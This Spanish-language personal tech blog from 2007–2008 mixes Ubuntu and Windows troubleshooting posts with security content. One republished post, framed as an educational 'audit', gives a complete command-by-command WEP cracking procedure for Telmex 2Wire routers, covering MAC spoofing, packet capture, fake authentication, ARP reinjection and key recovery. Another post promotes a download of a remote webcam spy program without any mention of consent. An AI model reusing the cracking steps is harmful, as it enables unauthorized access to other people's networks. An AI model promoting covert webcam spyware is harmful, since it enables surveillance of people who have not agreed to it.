Experiencias Profesionales... Ing. M. Gómez.

Programa Espia WebCam

2008-10-29T23:10:00.001-07:00

por ahi me encontre este archivo:

http://www.megaupload.com/?d=ZQN6V267

es un sistema espia de webcam remoto excelente para verificar remotamente las nuevas lap tops con camara web incluida...

GPARTED... adios partition magic

2008-08-22T10:39:00.000-07:00

Excelente live CD con las opciones de particionado mucho mejores que en particion magic.. 100% recomendado:

http://voxel.dl.sourceforge.net/sourceforge/gparted/gparted-livecd-0.3.4-11.iso

a215-SP4057 audio en linux

2008-02-25T06:40:00.000-08:00

Esto lo encontre por ahi, en agradecimiento al autor original he decidido publicarlo aqui tambien haciendo referencia a quien lo escribio ya que me saco del apuro al instalar ubuntu en mi nueva lap que fue un dilema con el audio... el enlace al autor original es:

http://fenrismx.blogspot.com/2008/02/instalacin-de-ubuntu-710-en-toshiba.html

autor fenrismx

Web actual del autor:

http://fenrismx.wordpress.com/2008/02/24/instalacion-de-ubuntu-710-en-toshiba-a215-sp4057primer-post/

Instalación de Ubuntu 7.10 en Toshiba A215 SP4057

Recientemente me decidí a instalar ubuntu en mi laptop y después de probar varias distribuciones, entre ellas Mandriva, Fedora, Suse, Ubuntu, me decliné por esta última.

Al principio no me dio problemas, arranque con el live cd, le di todo el disco duro, mande a la #$”$#%” al windows Vista que el equipo traía de fábrica, no por ser un freak de linux, simplemente vista no es de mi agrado. Despues de los pasos básicos de la instalación el sistema quedo listo y la máquina reinicio para ingresar por vez primera a ubuntu.

Aquí es donde comenzaron los problemas, no tenía soporte para redes inalámbricas, aceleración de video (aunque al menos me dio un driver genérico que me levantó el modo gráfico), ni audio. Vamos a resolver estos problemas paso a paso.

Si buscan en google, seguramente encontrarán mucha información, y tomando un poco de aqui y de alla, urgando entre foros, blogs y FAQ's encontrarán la información que están buscando, pero aquí esta el proceso completo y sin rodeos para este modelo en específico.

Prerrequisitos:

Ante de empezar debemos realizar ciertos cambios y actualizaciones al sistema.

Dirígete al menú Sistema-->Gestor de paquetes Synaptic, ahora dentro de la ventana del gestor abre el menú Configuración y selecciona la opción Repositorios, tendrás otra ventana frete a tí, la cual contiene varias pestañas, la primera es Software de Ubuntu, marca todas las casillas y desmarca la casilla de Cdrom con Ubuntu 7.10 'Gutsy Gibbon'.Ahora hacemos lo mismo en la pestaña Software de terceros, que solo contiene 2 elementos. Ahora pasamos a la pestaña Actualizaciones y marcamos las primeras cuatro casillas (en caso de que no esten marcadas), abajo de estas se encuentra la opción de actualizaciones automáticas, ahí no movemos nada, cerramos la ventana, damos click al boton Recargar y actualizamos el sistema.

Una vez que tenemos el sistema actualizado reiniciamos el equipo.

Nota: Es muy importante que marques todos los repositorios, de lo contrario algunos drivers no funcionan o simplemente ubuntu “no sabe” de donde sacarlos.

Primero el Video:

No hay que hacer gran cosa, solo ir al menú Sistema-->Administración-->Gestor de controladores restringidos, nos detectará un controlador para tarjetas gráficas ATI, marcamos la casilla y nos mostrará una advertencia sobre el uso de software restringido, no nos interesa así que aceptamo y seguimos adelante. Tardará unos minuto instalando y posteriormente nos pedirá reiniciar el sistema, lo hacemos y listo, ya tenemos el video a resolución 1280x800 que es el máximo que ofrece el equipo.

Una cosa más, si al igual que yo te enamoráste de los efectos del escritorio en el cubo giratorio, ventanitas gelatinosas y demás efectos posibles gracias al XGL, pues de entrada no puedes activarlos, para hacerlo hay que abrir una ventana de consola (Aplicaciones-->Accesorios-->Terminal) y teclear lo siguiente:

sudo aptitude install xserver-xgl

Reiniciamos (nuevamente) y ya tenemos el compiz casi-listo.

Ok, ahora ya tenemos aceleración gráfica con nustra tarjeta ATI, tenemos también XGL y podemos activar los efectos de escritorio (Sistema-->Preferencias-->Apariencia-->Pestaña 'Efectos visuales') el único inconveniente es que no tenemos forma de personalizar los efectos que están disponibles con el Compiz, para esto seguimo un proceso bastante sencillo; Abrimos el menú Aplicaciones-->Añadir y quitar... y en la opción Mostrar seleccionamos Todas las aplicaciones disponibles, ahora en la casilla de Buscar: tecleamos compiz y tendremos el software Advanced Desktop Effects Settings y lo seleccionamos para instalarlo, damos click en Aplicar cambios y ahora sí ya terminamos, tenemos aceleración con todo y eye candy.

Seguimos con la red inalámbrica:

Para empezar descarga el siguiente archivo:

http://www.datanorth.net/~cuervo/rtl8187b/rtl8187b-modified-dist.tar.gz

una vez que lo tengas en el equipo “extraelo/decomprimelo” en tu carpeta principal, te aconsejo renombrar la carpeta también con un nombre más corto para que séa fácil acceder a ella (por ejemplo Wlan o rtl). Ahora abre una consola y entra a la carpeta donde estan los archivos:

cd nombre-de-carpeta

./makedrv

sudo ./wlan0up

Con esto ya tienes instalada la red inalámbrica, y solo es cuestión de esperar a que detecte tu router. Cabe hacer algunas aclaraciones:

la última línea es la que hace el truco, cada que enciendo la máquina tengo que entrar a la carpeta donde está el driver y cargarlo (comandos 1 y 3 solamente), cuando lea como automatizar esto lo posteo, y para desactivar el driver esta la siguiente línea:

sudo ./wlan0down

Eso es todo, este driver es el más sencillo de cargar.

Driver de Audio:

Este es el que más dolores de cabeza me dio, el proceso es más largo, pero al final funciona y tenemos la laptop con todos los servicios activos y lista para rockear.

Aquí vamos:

Abre el menú Sistema-->Administración-->Gestor de paquetes Synaptic, dale un click al botón Buscar, y en la ventana de búsqueda escribe linux-backports-modules, en los resultados busca unos archivos con el nombre: linux-backports-modules, linux-backports-modules-generic 2.6.22.14.21, y linux-backports-modules-generic; márcalos todos para que se instalen. ahora da un click en el botón Aplicar.

Reiniciamos el equipo. Todavía no hay audio, así que seguimos.

Ahora abrimos una consola y tecleamos lo siguiente:

sudo aptitude install libc6-dev g++ gcc

sudo aptitude install libncurses5-dev

sudo aptitude install gettext ja-trans

Hay que descargar el driver de la página de Realtek, les dejo la dirección para simplificar la búsqueda:

ftp://209.216.61.149/pc/audio/realtek-linux-audiopack-4.07b.tar.bz2

Una vez que tengamos el driver lo descomprimimos, entramos a la carpeta del mismo y en la consola tecleamos lo siguiente:

sudo ./install

En este punto vamos a tener frente a nosotros una aplicación de instalación en modo texto, es muy sencilla, nos pide seleccionar la tarjeta a instalar, pero solo cuenta con 2 opciones, seleccionamos ATI Technologies Inc SBx00 Azalia, y ya esta, nos falta muy poco.

Este es el último paso, tenemos que ir a la carpeta /etc/modprobe.d/ y en ella buscar el archivo sound, antes que nada debemos darle permisos de escritura por medio de la consola:

Nota: cuando abrimos la consola esta posicionada en la carpeta de usuario, así que aquí esta todo el proceso desde que abrimos la consola hasta que le asignamos permisos de escritura al archivo:

cd ..
cd ..
cd etc
cd modprobe.d
sudo chmod 777 sound

Nota 2: Para aquellos que no hayan usado unix, para salir de un directorio es el mismo comando cd.. que se utiliza en m-dos, pero aquí dejamos un espacio entre cd y los dos puntos.

Ahora abrimos el archivo sound desde la carpeta en el modo gráfico, el sistema nos va a preguntar si queremos ejecutarlo, mostrarlo, cancelar, ejecutar en terminal, vamos a mostrarlo y entonces al final del archivo agregamos la siguiente línea:

options snd-hda-intel model=toshiba

Guardamos el archivo, reiniciamos el equipo y ahora sí ya tenemos audio.

Espero esto le sea de utilidad a alguien que tenga un modelo de laptop similar a la mía, a decir verdad fue un dolor de cabeza el dejar todo funcionando, pero eso sí, aprendí algunas cosillas sobre el uso del sistema.

Republicacion de: Auditoria de Routers 2Wire en Mexico

2008-01-18T05:35:00.001-08:00

Pues bien, como sabran todos, su servidor que redacta se dedica a la consultoria de redes y telecomunicaciones ademas de prestar servicios en diversos trabajos mas... Hace algunos meses, para ser exactos el 6 de agosto del 2007, publique en la pagina de foros http://foro.elhacker.net un articulo de auditoria wireless en los routers 2wire de infinitum, esto lo hice debido a que note la gran deficiencia de seguridad existente en este tipo de sistemas dentro de su interfaz inalambrica activada de manera automatica; el articulo originalmente lo publique en el link: http://foro.elhacker.net/index.php/topic,175389.0.html y hoy lo re-publico en mi blog ya que he notado que hay visitantes que han tenido el interes de leer este tipo de temas. Hago enfasis en que este articulo se refiere exclusivamente a una forma de AUDITAR routers 2Wire y se hace con fines educativos para poder encontrar SOLUCION a este problema de seguridad, no me hago responsable del para que sea utilizada esta informacion ya que la intencion es la de MEJORAR LOS SISTEMAS DE SEGURIDAD EXISTENTES EN EL ROUTER 2WIRE. Asi pues desde ahora les digo que NO SE PERMITEN COMENTARIOS DEL TIPO: "cómo hackeo el router de mi vecino para tener internet gratis" o "como hackeo un router que no es mio para obtener conexion a esa red"... No es mi objetivo generar crackers, recuerden que un hacker es aquel que nota deficiencias de seguridad y auxilia a eliminarlas, por otro lado un cracker es aquel que usa las fallas de seguridad para su propio beneficio... NO APOYO CRACKERS!!! todo cracker desde mi punto de vista es indeseable, dediquense a auxiliar no a fregar... Saludos y sin mas preambulos aqui esta la publicacion:

ABSTRACT:

Los sistemas de red existentes en México estan manejados en su gran mayoría por Telmex (Telefonos de Mexico), lo cual infiere que tambien los servicios de internet en banda ancha dsl lo esten.

Prodigy Infinitum es el nombre del servicio de internet de banda ancha dsl que ofrece Telmex a sus clientes, a los cuales al contratar les regalan un modem dsl el cual es marca 2Wire y en ocasiones traen interfaz inalambrica para poder dar servicio inalambrico al hogar donde fue contratado. Curiosamente, este tipo de sistemas vienen cifrados unicamente con claves WEP de 10 numeros hexadecimales. Aunado a esto los 2Wire vienen con una potencia de transmision que puede llegar a 1 cuadra de distancia dependiendo de la ubicacion en el hogar que fue instalado, esto representa que cualquier persona con tarjeta de red inalambrica y la clave correcta (ya que es variable en cada aparato la clave) podria enlazarse facilmente. El presente articulo intenta dar una forma rapida y una explicacion sencilla de como obtener la clave en estos aparatos con fines educativos y hacer ver que existe una vulnerabilidad en ese tipo de sistemas.

====================================================

1. Detectando el 2Wire.

La deteccion del aparato es sencilla de reconocer, debido a que los ESSID son intuitivos, los mas antiguos 2Wire inalambricos de prodigy infinitum aparecen con un essid de la siguiente manera:

2Wire0000

donde 0000 son 4 digitos que identifican el serial del aparato (normalmene estos 4 digitos siempre son diferentes). Asi mismo los mas nuevos tienen un formato:

INFINITUM0000

donde igualmente 0000 son 4 digitos que identifican el serial del aparato.

Es importante copiar el nombre exacto del ESSID, el canal en el que funciona y la direccion mac (todos estos datos se pueden tomar del netstumbler a simple vista).

*NOTA: Para este ejemplo supondremos que el ESSID es INFINITUM0001, el canal es 6 (ya que casi todos los 2Wire trabajan en el canal 6) y la direccion mac es AA:BB:CC:DD:EE:FF

2. Verificacion de distancias

En mexico la comunidad Linux esta poco difundida al entorno estudiantil y profesional, sin embargo se que habemos fieles linuxeros. Para ambos va la explicacion:

El NetStumbler (descarga http://www.netstumbler.com/downloads/) es el mejor programa que conozco para windows, el calculo de la distancia efectiva se realiza por medio de los decibeles, recomiendo estar a -60 decibeles como maximo ya que en los rangos de -70 a -80 no podremos autenticarnos falsamente (ojo con esta nota pq es quizas la mas importante).

3. Pasos preliminares al hacking.

Una vez que estamos a distancias entre -50 y -60 decibeles, estaremos seguros de que ya estamos lo suficientemente cerca del aparato como para obtener la clave en tan solo 20 Minutos (verificado 3 veces este tiempo con 3 diferentes aparatos, en algunas ocasiones solo se requirio de 15 minutos de captura con reinyeccion), arrancamos nuestra distribucion LiveCD ya sea WifiWay (descarga http://www.comprawifi.com/index.php?act=wifiway) o WifiSlax (descarga http://www.comprawifi.com/index.php?act=wifislax) o el que mejor les parezca y sobre todo que reconozca su tarjeta inalambrica (comprueba que el chipset de tu tarjeta soporte modo monitor aqui: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers).

Una vez arrancado el sistema de Linux en LiveCD, abrirmos una TERMINAL o linea de comandos y tecleamos:

iwconfig

Con esto nos apareceran todas las interfaces inalambricas (las que no son inalambricas diran "no wireless extension"). Verificamos cual es la que corresponde a nuestra tarjeta inalambrica y copiamos el nombre de la interfaz (Para este ejemplo supondremos que la interfaz es una broadcom 43XX identificada como eth1). Posteriormente tecleamos esto:

iwconfig eth1 rate 1M channel 6
ifconfig eth1 hw ether 00:11:22:33:44:55
airmon-ng start eth1

los tres comandos anteriores realizan la accion de colocar la tarjeta inalambrica en la tasa de transferencia a 1Mbps dentro del canal 6 que es el del 2wire para nuestro ejemplo, le cambia la direccion mac original a 00:11:22:33:44:55 y la pone en modo monitor para captura de paquetes.

4. Iniciando la captura.

Una vez que tenemos ya hechos los pasos anteriores estamos listos para comenzar con la captura de los paquetes iv.

Primero que nada recomiendo ampliamente abrir otras tres TERMINAL o lineas de comando, para poder hacer simultaneamente captura, autenticacion y reinyeccion de paquetes asi como crackeo de clave.

El la primer TERMINAL que ya teniamos abierta colocamos el siguiente codigo:

[X]--> airodump-ng --ivs --bssid AA:BB:CC:DD:EE:FF -w crackinfinitum -c 6 eth1

airodump-ng --bssid AA:BB:CC:DD:EE:FF -w crackinfinitum -c 6 eth1

*NOTA: Gracias a Rey11 por la anexa colaboracion en este paso ya que se pueden usar ambos, el tachado y el normal, pero el normal que comento Rey11 en el foro de http://foro.elhacker.net permite que el wep cracking se logre realizar a solo 60000 (incluso menos) paquetes IV y no se requiere esperar hasta 250000 pquetes IV para realizar el wep cracking.

Esto lanzara el airodump-ng y se comienza con la captura de paquetes en el archivo ([X]---> crackinfinitum-01.ivs) crackinfinitum-01.cap (el ([X]--> -01.ivs) -01.cap se agrega solo, no hay que escribirlo en el comando).

5. Iniciando la autenticacion falsa y la reinyeccion.

Normalmente los 2Wire de infinitum no tienen mucho trafico ni clientes conectados dado que la mayor parte de las personas en mexico tiene preferencia por las computadoras de escritorio para sentarse a chatear por largos periodos y comunmente estan conectados directamente al router 2Wire via cableada, asi que sera dificil que alguien con una portatil e interfaz inalambrica este transmitiendo datos. Para cuando sucede esto tenemos que autenticarnos falsamente para generar paquetes ARP y poder generar asi trafico traducido en paquetes iv. Por lo tanto tecleamos en la segunda ventana de TERMINAL lo siguiente:

aireplay-ng -1 6 -e INFINITUM0001 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 eth1

Identifiquemos que -e es el essid, -a es el bssid y -h es el cliente a autenticarse falsamente, es decir, nuestra propia tarjeta inalambrica en este ejemplo cada 6 segundos.

Una vez que nos aparece que se ha logrado la autenticacion, estamos listos para reinyectar paquetes. Si no aparece que la autenticacion se ha logrado entonces quiere decir que estamos lejos del 2Wire, y que no hicieron caso a la nota de estar a -50 o -60 decibeles de distancia, en caso de que aun estando a esa distancia no quiera autenticar falsamente entonces tendremos que acercarnos aun mas.

Posteriormente ya autenticados falsamente, procedemos a la reinyeccion de paquetes colocando en la Tercer Ventana TERMINAL lo siguiente:

aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 eth1

Sobra decir que -b es el mac del 2wire, -h es la mac de nuestra tarjeta y eth1 es el identificador de nuestra tarjeta.

Este ultimo codigo debera generar una transferencia de paquetes ARP reinyectados los cuales a su vez haran que en la primer ventana de TERMINAL los # DATA crezcan rapidamente a una tasa de 200 a 300 paquetes por segundo...
Al tener al rededor de 250000 paquetes en #DATA podremos realizar el siguiente paso.

6. "Cracking"(bajo responsabilidad del que lo usa) de llave WEP

Ya que tenemos ([X]--> 250000) 60000 paquetes IV es decir lo que marca el #DATA en la primer ventana del TERMINAL donde se corre el airodump-ng, podremos "crackear" y obtener la llave WEP por medio de un ataque de fuerza bruta (no me hago responsable de este paso, cada quien se hara responsable de las consecuencias legales que este paso genere). Sin embargo debemos recordar el archivo en el que se guardo nuestra captura de paquetes, el cual si recordaremos para este ejemplo se llama: ([X]--> crackinfinitum-01.ivs) crackinfinitum-01.cap para posteriormente teclear lo siguiente:

[X]---> aircrack-ng crackinfinitum-01.ivs

aircrack-ptw crackinfinitum-01.cap

*NOTA: Gracias a Rey11 del foro de: http://foro.elhacker.net por la anexa colaboracion en este paso ya que se pueden usar ambos, el tachado y el normal, pero el normal que comento Rey11 permite que el wep cracking se logre realizar a solo 60000 (incluso menos) paquetes IV y no se requiere esperar hasta 250000 pquetes IV para realizar el wep cracking.

Esto nos dara como resultado KEY FOUND [xx:xx:xx:xx:xx:]
Donde las x representan numeros que corresponden a los digitos hexadecimales que componen la clave. Al llegar a esto, habremos obtenido la clave y solo tenemos que introducir la clave toda junta y sin los dos puntos cuando se pida al momento de la conexion en windows.

7. Conclusiones

Los sistemas que tienen cifrado WEP son vulnerables ya practicamente en todos lados. No se requieren mas de 20 minutos para poder obtener la clave y esta clave lamentablemente esta en todos los 2Wire que prodigy Infinitum provee a sus clientes, por lo cual es recomendable para los dueños que no utilizan la interfaz inalambrica de este tipo de aparatos que desactiven dicha interfaz ingresando a la pagina de configuracion del router, de esta manera no tendran accesos no autorizados a su red.

Solucion al Problema: "no puedo seleccionar mostrar archivos y carpetas ocultos"

2008-01-17T06:19:00.001-08:00

Bien... Recientemente la gran variedad de memorias Flash USB portatiles permiten transportar facilmente increibles cantidades de informacion en espacios muy reducidos, existen memorias de 64, 128, 256, 512, 1gb, 4gb, etc... Hace algunos años, cuando usabamos los discos flexibles de 5 1/4 " ya se hacian presentes los "transportes" gratuitos a los archivos infecciosos que se reproducian en otros ordenadores... si, los VIRUS... Hoy en dia es mucho mas facil que nunca transportar virus sin darnos cuenta, tal es el caso de una gran variedad de virus diseñados con pocos pasos mediante archivos .bat y un simple autorun.inf... Que sucede? pues bien, se crea un archivo autorun.inf con la orden de ejecutar automaticamente un programa .bat, el autorun se activa cuando insertamos una memoria o cuando le damos doble click a la unidad de dicha memoria flash, ese manda a llamar la ejecucion automatica (si, eso significa autorun) del archivo .bat, el archivo .bat lo usamos muchos de los miembros de la vieja escuela del MSDOS, se llama archivos de ejecucion por lotes, el cual es una simple secuencia de comandos basados en el command.com de MSDOS y que pueden generar estragos increiblemente fuertes ya que se ejecutan de manera arbitraria en el sistema (casi todas las sesiones de usuario en los equipos con windows de hoy en dia son ADMINISTRADORES por defecto, por lo tanto un archivo .bat ejecuta comandos en modo administrador sin restricciones)... Lo peor de todo el caso es que al ser archivos .bat creados de la nada por cualquier usario de mediano nivel de conocimientos y debido a que pueden ponerle el nombre que quieran, la base de datos de los antivirus no se da abasto para determinar los nombres y formas de ejecutar cada virus (la solucion definitiva podria ser que los antivirus no permitan la ejecucion de NINGUN .bat algo asi como un denny all *.bat, sin embargo aun hay programas que utilizan los .bat para ejecuciones importantes de sistema).

Ok despues de esta breve explicacion, comento lo siguiente: recientemente uno de esos virus cayo en mi sistema pero a un nivel diferente a los otros... El descubrimiento de los virus con el comportamiento comentado en la introduccion ya lo habia hecho desde hace unos meses, mi solucion en ese momento fue simplemente colocar la opcion de MOSTRAR ARCHIVOS OCULTOS y deshabilitar la opcion de OCULTAR ARCHIVOS PROTEGIDOS DEL SISTEMA, de esta manera, cuando insertaba la memoria en vez de darle doble click a la unidad solo iba a la barra de direcciones y ponia la unidad misa (ejemplo si se generaba la unidad E: ponia directamente en la barra de direcciones del explorador de windows E:\ enter, con esto no se ejecuta el autorun y se accede a la unidad de manera directa). Al ingresar a la unidad de esta forma no habia ejecucion de autorun y por ende no habia ejecucion de .bat, al tener habilitado que se mostraran TODOS los archivos incluyendo los de sistema y los ocultos, podia verificar y borrar tanto el autorun.inf, el archivo .bat y en caso de que tambien trajera carpetas con informacion infecciosa oculta me permitia eliminarla por completo... asi estuve un tiempo, vacune de esta forma manual muchas memorias, como ya comente en anteriores ocasiones tambien soy catedratico de un instituto de educacion y creanme que los virus estan a la orden del dia, por lo cual esta medida de seguridad aunada a mi antivirus actualizado me permitia burlar a los virus... Sin embargo, como dije al inicio de este parrafo, me cayo un virus diseñado de manera un poco mas inteligente, el virus al ejecutar un archivo señuelo que reaccionaba al tratar de eliminarlo, ejecutaba en segundo plano el .bat y este bat eliminaba del registro de windows en cada inicio la posibilidad de ver archivos ocultos y de sistema... conclusion... me supero, al querer cambiar las opcion de mostrar archivos de sistema y archivos ocultos me retornaba a la opcion de no mostrar archivos ocultos y ocultar archivos de sistema justo al dar aplicar, es decir, no habia forma de que manualmente se modificaran los valores... probe entonces con el registro, funcionaba mientras no reiniciara el sistema ya que aparentemente la ejecucion del virus tambien estaba en mi sistema marcado para cada reinicio y no aparecia en el msconfig... al tener estos problemas decidi auxiliarme de la red para ver si encontraba informacion, el resultado de la busqueda fue el siguiente programa llamado elistara proveido por satinfo.es y que en realidad busca y encuentra los archivos infecciosos con este comportamiento... el enlace para la descarga es:

http://www.zonavirus.com/datos/descargas/78/EliStarA.asp

Espero les funcione como a mi ya que esto ayudo a que volviera a la opcion de ver los archivos ocultos... si alguien tiene experiencias con estos virus de las memorias USB espero puedan postear para ir conociendo mas versiones y sus reacciones para no caer en las trampas de los programadores viruistas...

Desinstalar AVG en un win98/Me

2008-01-03T23:29:00.000-08:00

Bien bien... Otro dolorcito de cabeza se presenta a la hora de desinstalar antivirus... Para quienes hayan seguido los pasos de este blog, recordaran en episodios anteriores que ya tuve un conflicto (por cierto fue el inicio del blog), con un maldito Panda Antivirus que al desinstalarlo fue un caos, la computadora fue lentisima y muchas mas cosas (leer el primer post, ahi encontraran la aventura de como desinstalar el panda antivirus definitivamente sin problemas)....

Pues bien, ahora se me presento un problema y no deja de dar vueltas en mi cabeza mi archireconocida frase "el camino a la perfeccion solo genera mas problemas por resolver", esa frase siempre la he dicho y curiosamente siempre se cumple, es como la ley de murlphy pero remix como "ley de gomez"...

La historia:

Un cliente me trajo una PC antiguisima, un procesador Intel a 233Mhz, 64Mb de memoria y un disco duro de 3.20 GB, la mision era rescatarla del olvido e instalarla dejandola lista para acceso a internet con prodigy infinitum via cable UTP... Pues bien, le di un formato de bajo nivel al disco duro para no tener conflictos, luego con fdisk cree la particion nuevecita FAT32, di formato completo desde linea de comandos con format c:/u , instale el windows 98, el office 2000 premium, el internet explorer 6 y hasta me dio para instalar el Windows media 9... Hasta este punto todo iba genial, todos los controladores listos, la maquina corria a buena velocidad... pero ahi vamos... el camino a la perfeccion solo genera mas problemas por resolver... se me ocurrio instalar el AVG Free... si, proteccion antivirus, no fuera a ser que se tronara el win98 (si ya de por si truena con sus pantallitas azules)... pues bien, una vez instalado el problema empezo desde el primer reinicio... Debo destacar que jamas habia instalado AVG en un equipo con win98, de ahi que me sorprendiera que al inicio se lanza una aplicacion en modo linea de comando para analizar los archivos, esto genera que el inicio de la PC aumentara en cerca de 1 minuto el tiempo de arranque, pero ahi no termina el asunto, el tiempo de arranque durante el logo de windows tambien se incremento como en 25 segundos mas, pero aun hay mas, una vez pasada la ventanita para cargar el resident shield (o algo asi como el agente en tiempo real que busca virus en el sistema) demora cerca de 35 segundos... un tiempo total de arranque como de 5 minutos :S G-LOOOOOW ya ni virus vista, digo windows vista!!!

ahhhh pero eso no es todo, no solo afecta el arranque del sistema, si no que afecta tambien al OFFICE!!!!, el bendito office cada vez que se lanza una aplicacion de la suite (es decir, cuando abres WORD, EXCEL, POWER POINT, etc) este se torna lentisimo, dado que manda a llamar la ejecucion del antivirus para verificar si existen detalles por resolver... Conclusion, tarda como 1 minuto en abrir el mugre Word o el excel, etc.

En fin, me di cuenta de mi error (jejejejej bastante tarde por cierto) e intente desinstalar el AVG Free (jajaja pobre iluso).... Resulta ser que hay un bug en el unistaller de AVG Free que impide desinstalarlo cuando este se ha cargado en el sistema, al momento de hacer el backup de uno de los archivos truena la desinstalada...

Buscando por algo asi de 20 minutos en internet como desinstalar esa mugre, encontre unos pasos que me resultaron y que ahora pongo aqui para quien tenga problemas:

Desinstalar AVG Free de Windows 98:

1.- Abrir el archivo autoexec.bat con un block de notas (esto se puede hacer muy simple, das inicio, luego ejecutar, colocas en la caja de texto: notepad C:\autoexec.bat y das enter)

2.- Eliminar la linea correspondiente al bootup de AVG (esto elimina el programa en linea de comandos que busca virus en el momento del arranque del sistema)

3.- Despues de el paso anterior REINICIAS la PC, notaras que ya no aparece el programa de busqueda de virus inicial en linea de comandos.

4.- Una vez iniciado el sistema nuevamente, entras al msconfig y eliminas de la pestaña INICIO todo lo que tenga que ver con AVG (para entrar al msconfig dar inicio, luego ejecutar, colocas en la caja de texto: msconfig y das enter)

5.- Despues del paso anterior REINICIAS la PC, notaras que el resident shield ya no se carga en el sistema.

6.- Una vez iniciado el sistema nuevamente, entras al panel de control, te vas a agregar quitar programas y ahora si, DESINSTLA EL MALDITO AVG Free...

Con esto tu sistema regresa a la normalidad... prefiero quedarme sin antivirus para ganarle un poco de velocidad a este sistema... ojala a alguien le sirva esta informacion, saludos!!!

Drivers para XP de la notebook Toshiba a215-sp4057

2008-01-02T20:51:00.001-08:00

Bien, me compre una nueva notebook dado el conflicto que surgio por el desperfecto en la fuente de poder de mi antigua Compaq Presario V3117LA (NO RECOMENDADA!!!)...
El desperfecto me hizo "gastar" mi aguinaldo en una nueva notebook Toshiba a215-sp4057... Todo iba bien, procesador Athlon X2 a 1800mhz cada nucleo, 1GB de RAM, 120GB de disco duro, una tarjeta de red inalambrica REALTEK y excelente sonido... PERO!!! trae el 100000000 % odiado VIRUS VISTA digo, Windows Vista... El maldito Ventanitas Vista es uno de los peores sistemas operativos que he utilizado, a decir verdad pense que el Windows Me habia sido el peor "virus" desarrollado por Microsoft, pero me doy cuenta que se esmeraron mucho para poder crear uno peor... y lo lograron...

En fin, despues de eliminar por completo las particiones (salvo la de recuperacion) me di a la tarea de tomar mi Windows eXPerience Retail e instalarlo en mi nueva notebook... Pero oh sorpresa, faltaban drivers... Me di entonces a la tarea de buscarlos por cielo mar y tierra en las paginas de los fabricantes... El resultado es lo que presento el dia de hoy como el PACK DE DRIVERS XP PARA TOSHIBA A215-SP4057 e incluso funcionan para algunas otras notebooks de la serie A215... Espero le sean de ayuda a alguien mas ya que les ahorrara horas y horas de busqueda, tarde aproximadamente 18 horas efectivas (obviamente no continuas) de busqueda asi que evitensela y descarguen el pack. Saludos!!!

NOTA.- si no tienes winrar para descompactar te recomiendo lo descargues de la pagina http://www.softpedia.com

2007-12-26T09:41:00.000-08:00

Aislado de la civilizacion...

Me la he pasado todo el dia 24 de diciembre en el intento de conectarme a internet...

Claro, si hablaramos de que tengo problemas con mi dsl modem o con mi linea telefonica pss todo seria facil de solucionar...
Pero nooooo, estoy en medio de la nada... en el rancho de mis abuelos, aproximadamente a 35 kilometros de la ciudad mas cercana y mas o menos a 22 kilometros del camino asfaltado (digase carretera) mas cercano... conclusion, estoy verdaderamente en medio de la nada...

Sobrevivo con mi lap top cargandola al tomacorriente de mi camioneta asi como cargando mi celular de movistar a la misma gracias a un inversor de corriente que conecto cuando mi camioneta esta encendida... en efecto, no hay corriente electrica de CFE por los alrededores, practicamente la señal de celular es nula con movistar asomando apenas 1 linea de señal y a veces muy a veces 2 lineas de esta (telcel tiene mejor señal aqui con 3 lineas y aveces hasta las 4 completas pero puff esta carisimo para hacer lo que a continuacion describire)... totalmente desesperado pero armado de todos mis gadgets que traigo siempre en la maleta magica, conecto mi dongle bluetooth a la computadora y trato por horas de buscar la mejor posicion para mi celular movistar de forma tal que ande rondando las 2 lineas de señal... despues de cerca de 6 horas con sus descansos derivados de la desesperacion, logro posicionar mi celular sobre un tronco elevado y recuerdo mi curso de inalambricas llevado con el benemerito maestro benito juarez en la maestria la cual dicho sea de paso me quebro la cabeza con calculos de ondas de progragacion y todo para terminar poniendole un pinche plato metalico desechable a la parte posterior de celular mas o menos a 5 centimetros de separacion para generar refraccion de señal, con esto, al fin pude realizar un marcado mediante el bluetooth de la PC puenteado al bluetooth de mi telefono celular usando este ultimo como modem... que a donde marco? bueno, dado que infinitum tiene la misma contraseña y usario para conexion telefonica, use esos mismos datos de mi conexion dsl (alla donde si paso dios repartiendo internet de banda ancha) pero ahora marcando por el modem generado con el celular al servidor prodigy de mi ciudad de origen (de todas formas en movistar es roaming nacional), el cobro??? pss son 5 pesos por 20 minutos de "preciosa" conexion... Preciosa? pero si conecta a 56kbps!! dios santo, pedro pica piedra se estaria burlando de mi con su piedromodem dsl, pero bueno, 56kbps a 15 pesos por una hora de enlace a internet en medio de la nada creo que es mejor que estar buscandole forma a las pinches nubes!!! (eso estaba haciendo cuando se me ocurrio lo del puente bluetooth)...

Gracias a esa conexion hoy les escribo para desearles feliz navidad y crudelia de 25, asi mismo les deseo un feliz año nuevo esperando que todo lo que quieran se cumpla, asi mismo les recuerdo que si desean realmente lograr algo busquenlo, persiganlo, aferrense a el y no hagan caso de lo que otros les digan como por ejemplo: terco(a), necio(a), loco(a) o en su defecto para algunos que conozco ÑOÑOS (AS), siempre piensen que ustedes son lo que son por que asi les gusta ser (lo ñoño(a) no se quita y se nota a leguas jajajaja), no importa lo que los demas les digan, sigan adelante y lleguen donde a los demas no tienen la intencion de llegar, ya que no estos ultimos no lleguen por weba o simplemente por que no les interesa llegar, a fin de cuentas lo que es importante para unos para otros no los sera, de igual forma una cosa es que otros logren algo y otra es que a nosotros nos identifique lo que esos otros lograron o lo que persiguen, cada quien busca lo que quiere, asi pues simplemente demosle por su lado a quien dice lograr algo "importante" aunque no nos parezca algo muy significativo lo que esa persona haya logrado, al menos asi todos se quedan con la satisfaccion de lograr lo que perseguian aunque para nadie mas sea importante, jajajaja que pendejo consuelo verdad, pero que le vamos a hacer, asi es la vida, a veces estamos peor ya que lejos de que otros nos echen la mano apoyandonos aunque no se interesen realmente, optan por intentar destruirnos con criticas, y peor aun hacemos caso a esas criticas, en fin, ya llevo como 5 pesos de conexion jajajaja, asi que reciban un cordial abrazo desde un lugar en medio de la nada... saludos y pasenla super con sus familiares y amigos!!!

Terrible vulnerabilidad en 2Wire

2007-12-19T06:42:00.000-08:00

Rayos!!!

Existe una vulnerabilidad impresionante en los dsl modems / routers que da telmex...

Hoy usmeando por la red encontre un articulo de la unam donde el cert encontro una vulnerabilidad terrible que permite cambiar la contraseña del router 2wire y no solo eso, si no modificar los dns para realizar un ataque man in the middle :S chetos!!!!
el ataque se realiza sobre las siguientes direcciones:

